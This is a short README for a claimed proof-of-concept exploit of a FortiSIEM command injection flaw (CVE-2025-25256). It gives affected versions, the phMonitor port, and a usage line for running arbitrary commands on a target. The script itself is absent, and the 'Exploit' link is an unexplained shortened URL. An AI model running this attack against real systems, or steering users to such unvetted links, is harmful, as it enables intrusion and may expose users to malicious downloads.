CVE-2025-25256: Fortinet FortiSIEM OS Command Injection PoC# CVE-2025-25256: Fortinet FortiSIEM OS Command Injection PoC
## Overview
This repository contains a proof-of-concept exploit for CVE-2025-25256, a critical (CVSS 9.8) unauthenticated OS command injection vulnerability in Fortinet FortiSIEM. The flaw allows remote attackers to execute arbitrary commands via crafted CLI requests to the phMonitor service on port 7900.
## Affected Versions
- FortiSIEM 6.1 to 6.6: All versions
- FortiSIEM 6.7.0 to 6.7.9
- FortiSIEM 7.0.0 to 7.0.3
- FortiSIEM 7.1.0 to 7.1.7
- FortiSIEM 7.2.0 to 7.2.5
- FortiSIEM 7.3.0 to 7.3.1
Upgrade to 7.3.2+ or 7.4.0 as per [Fortinet advisory](https://www.fortiguard.com/psirt/FG-IR-25-152).
## Usage
Run the exploit:
```
python3 cve-2025-25256.py -t <TARGET_IP> -p 7900 -c "<COMMAND>"
```
See the script for more details.
## Disclaimer
This tool is provided for educational and security research purposes only. Use responsibly and only on systems you own or have permission to test.
## Exploit
[href](https://tinyurl.com/y2pwvkun)
Follow me for more vulnerability research.
[4.0K] /data/pocs/b2fc334cd011919d30173dfaaff476d46024b944
└── [1.0K] README.md
0 directories, 1 file